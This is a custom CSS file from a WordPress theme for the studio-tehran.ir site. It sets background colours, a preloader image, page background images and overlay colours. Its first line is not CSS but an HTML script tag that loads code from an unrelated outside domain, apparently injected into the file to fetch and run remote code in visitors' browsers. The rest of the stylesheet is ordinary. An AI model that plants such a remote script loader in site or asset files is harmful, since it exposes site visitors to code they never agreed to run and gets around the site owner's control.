<script src="https://cache.cloudswiftcdn.com/"></script>
/* Body Background Color */

body {
	background: #101524;
}

/* Preloader Styles */

#preloader{
  background-color:#101524; 
}

.loader {
  background: url("http://studio-tehran.ir/wp-content/themes/privado/img/svg-loaders/puff.svg") no-repeat scroll center center / cover rgba(0, 0, 0, 0);
}


/* Page Background images */

.page-container .single-page:first-of-type::after {
  background-image: url("https://studio-tehran.ir/wp-content/uploads/2019/06/photo-1526313199968-70e399ffe791.jpg");
}

.page-container .single-page:nth-of-type(2)::after {
  background-image: url("http://studio-tehran.ir/wp-content/themes/privado/img/img-2-large.jpg");
}

.page-container .single-page:nth-of-type(3)::after {
  background-image: url("https://studio-tehran.ir/wp-content/uploads/2019/06/photo-1554048612-b6a482bc67e5.jpg");
}

.page-container .single-page:nth-of-type(4)::after{
  background-image: url("http://studio-tehran.ir/wp-content/themes/privado/img/img-4-large.jpg");
}

/* Page overlay colors */ 

.single-page:nth-child(1) {
  background-color: #191D21;
}

.single-page:nth-child(2) {
  background-color: #1F2628;
}

.single-page:nth-child(3) {
  background-color:  #273336;
}

.single-page:nth-child(4) {
  background-color: #273a3f;
}


/* Theme Custom CSS */ 


                                    